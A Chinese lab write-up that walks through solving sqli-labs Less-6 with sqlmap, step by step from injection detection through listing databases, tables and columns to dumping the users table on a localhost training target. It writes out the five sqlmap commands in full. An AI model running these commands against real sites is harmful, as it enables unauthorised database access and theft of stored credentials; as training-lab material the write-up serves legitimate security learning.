sqli-labs-Less-6自动化注入方法

sqli-labs 实验记录

Less-6

第一步:进行sqli注入漏洞检测

输入命令:

复制代码
sqlmap -u http://localhost/Less-6/?id=1 --batch

--batch 表示采用默认参数。

查询结果如图所示:存在注入漏洞,注入类型分别为:boolean-based blind, error-based, time-based blind,; 并给出了相应的payload。

第二步:查询服务器中的所有数据库

输入命令:

复制代码
sqlmap -u http://localhost/Less-6/?id=1 --batch --dbs

--dbs 表示查询数据库。

查询结果如图所示:数据库共有两个,分别为information_schema, security。

第三步:查询指定数据库中的所有表

输入命令:

复制代码
sqlmap -u http://localhost/Less-6/?id=1 --batch -D security --tables

-D security 表示指定查询数据库security;
--tables 表示查询数据库中的所有表。

查询结果如图所示:数据表共有4个,分别是emails, referers, uagents, users。

第四步:查询指定数据表中的所有列

输入命令:

复制代码
sqlmap -u http://localhost/Less-6/?id=1 --batch -D security -T users --columns

-T users 表示指定查询数据表users;
--columns 表示查询数据表中的所有列。

查询结果如图所示:数据列共有3个,分别是id, password, username。

第五步:查询指定数据表中的具体信息

输入命令:

复制代码
sqlmap -u http://localhost/Less-6/?id=1 --batch -D security -T users --dump

--dump 表示查询数据表中的具体信息

查询结果如图所示:数据表users中的具体信息共有13条。

相关推荐
奇特認4 小时前
mysql 集群技术 3.高可用之 MHA
数据库·mysql
画中有画8 小时前
自动化脚本开发最佳实践
运维·自动化
Blossom i10 小时前
大数据预处理与采集实验一:使用Python操作MySQL数据库
数据库·mysql
InfinitePlus10 小时前
Docker MySQL搭建一主一从
mysql·docker
m0_5257247210 小时前
Jenkins共享库目录规范解析
自动化
Atomic1213811 小时前
CVE 漏洞复现通论:从漏洞情报到 Root Cause 分析的标准化实战指南
web安全·网络安全·渗透测试
llgdwuhan12 小时前
CPO 架构革新撕开设备缺口:测试 + 耦合双赛道,国产迎来黄金窗口期
自动化·光模块·耦合测试设备·光模块耦合设备·芯片测试设备
坐吃山猪12 小时前
Docker07-MySQL
mysql·docker·容器
少晓年13 小时前
从 MySQL 迁移到人大金仓 KingbaseES:完整指南与实践
数据库·mysql
Zhu75815 小时前
使用helm在k8s集群部署MySQL单实例,支持当前所有主版本的最新子版本
mysql·adb·kubernetes